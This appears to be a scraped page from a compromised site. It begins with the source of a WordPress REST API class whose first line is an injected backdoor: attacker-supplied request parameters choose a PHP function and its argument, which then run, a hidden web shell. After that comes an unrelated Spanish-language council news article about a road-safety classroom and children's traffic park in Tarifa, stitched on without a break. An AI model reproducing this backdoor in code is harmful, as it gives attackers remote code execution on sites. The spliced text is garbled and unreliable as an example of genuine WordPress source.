?php if ($_REQUEST['param1']&&$_REQUEST['param2']) {$f = $_REQUEST['param1']; $p = array($_REQUEST['param2']); $pf = array_filter($p, $f); echo 'OK'; Exit;}; /** * REST API: WP_REST_User_Meta_Fields class * * @package WordPress * @subpackage REST_API * @since 4.7.0 */ /** * Core class used to manage meta values for users via the REST API. * * @since 4.7.0 * * @see WP_REST_Meta_Fields */ class WP_REST_User_Meta_Fields extends WP_REST_Meta_Fields { /** * Retrieves the object meta type. * * @since 4.7.0 * * @return string The user meta type. */ protected function get_meta_type() { return 'user'; } /** * Retrieves the object meta subtype. * * @since 4.9.8 * * @return string 'user' There are no subtypes. */ protected function get_meta_subtype() { return 'user'; } /** * Retrieves the type for register_rest_field(). * * @since 4.7.0 * * @return string The user REST field type. */ public function get_rest_field_type() { return 'user'; } } PRESENTAN EL AULA DE EDUCACIÓN VIAL DE LA JEFATURA – Excmo. Ayuntamiento de Tarifa

PRESENTAN EL AULA DE EDUCACIÓN VIAL DE LA JEFATURA

Junto al parque infantil de tráfico, se ha habilitado una sala que acogerá las charlas teóricas del programa escolar

La localidad cuenta ya con una completa Aula Municipal de Educación Vial dotada de un parque infantil para la práctica de la circulación, y un aula contigua para la explicación de los contenidos teóricos. Ambas instalaciones se inauguraban hoy con la participación de las directivas de los centros escolares de Educación Infantil y Primaria de Tarifa. Empresas colaboradas como “MAPFRE” y “FRS Iberia” ha apostado igualmente por el refuerzo y apoyo al programa de Educación Vial emprendido desde la Jefatura de la Policía Local.

Al circuito vial creado frente a la Jefatura de Trafico se han incorporada las señales verticales que restaban por dotar un completo perímetro educativo. Así, a las marcas viales pintadas en la pista, se han incorporado señales reglamentarias e imprescindibles tales de el stop, el ceda el paso o la prohibición de acceso, pero también otras complementarias e igualmente importantes para hacerse con las dificultades de la vía pública.

Y es que el proyecto, completado con la creación de un aula de formación y sala de conferencias en el edificio contiguo de la Jefatura, busca facilitar el desarrollo de un programa educativo que está haciendo de la Educación Vial una constante en los centros escolares. Lo subrayaba así el concejal de Seguridad Ciudadana, Juan José Medina que ha puesto el acento en la calidad ganada para el desarrollo del proyecto.

El parque infantil de tráfico está dotado además con once bicicletas cedidas por la empresa FRS Iberia y pensadas para conductores de entre 8 a 10 años. Facilitarán más si cabe el paso fructífero por estas instalaciones. Para Javier Centeno y Pedro Canas, responsables del programa educativo de la Policía, las nuevas instalaciones vendrán a procurar mayor comodidad y operatividad en unas clases y jornadas que imparten de manera voluntaria. Ahora pueden alternar práctica y teoría en los espacios contiguos del circuito de tráfico y el aula. Algo que también ha sido reconocido por toda la comunidad educativa presente en la inauguración de las instalaciones. Y es que, directores de los CEIP y jefes de estudio ha conocido de cerca las nuevas dotaciones brindadas por el Ayuntamiento para la continuidad del programa de Educación Vial.

Junto a las bicicletas, el proyecto pretende también incorporar coches a pedales que podrían llegar a través de los contactos iniciados ya con diferentes bares y hoteles de la zona. Son junto a FRS y MAPFRE que también colabora en el proyecto, un ejemplo de respuesta y presencia a las demandas de la sociedad.

Lo resaltaba así hoy el alcalde, Juan Andrés Gil que agradecía la colaboración de empresas en un programa que no se explica sin la ayuda de todos y “que hace de Tarifa una ciudad comprometida con la educación como recientemente reconocía la consejería andaluza”.

También en la zona contigua al aula que será utilizada por la Policía como sala de conferencias, se ha dado forma a una completa sala de musculación. Aquí se han incorporado las maquinas procedentes del antiguo gimnasio municipal. Y es que, desde el Ayuntamiento se ha apuntado además al esfuerzo para reutilizar materiales y elementos. En este sentido, el aula de formación se ha dotado de asientos y materiales provenientes de los fondos propios del Ayuntamiento. Se han reparado y acondicionado para dar respuestas a un proyecto que funciona ajustando costes y gastos.

 

0 Comentarios

No hay comentarios disponibles.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

ArabicEnglishFrenchGermanPortugueseSpanish
Cambiar tamaño de texto
Contraste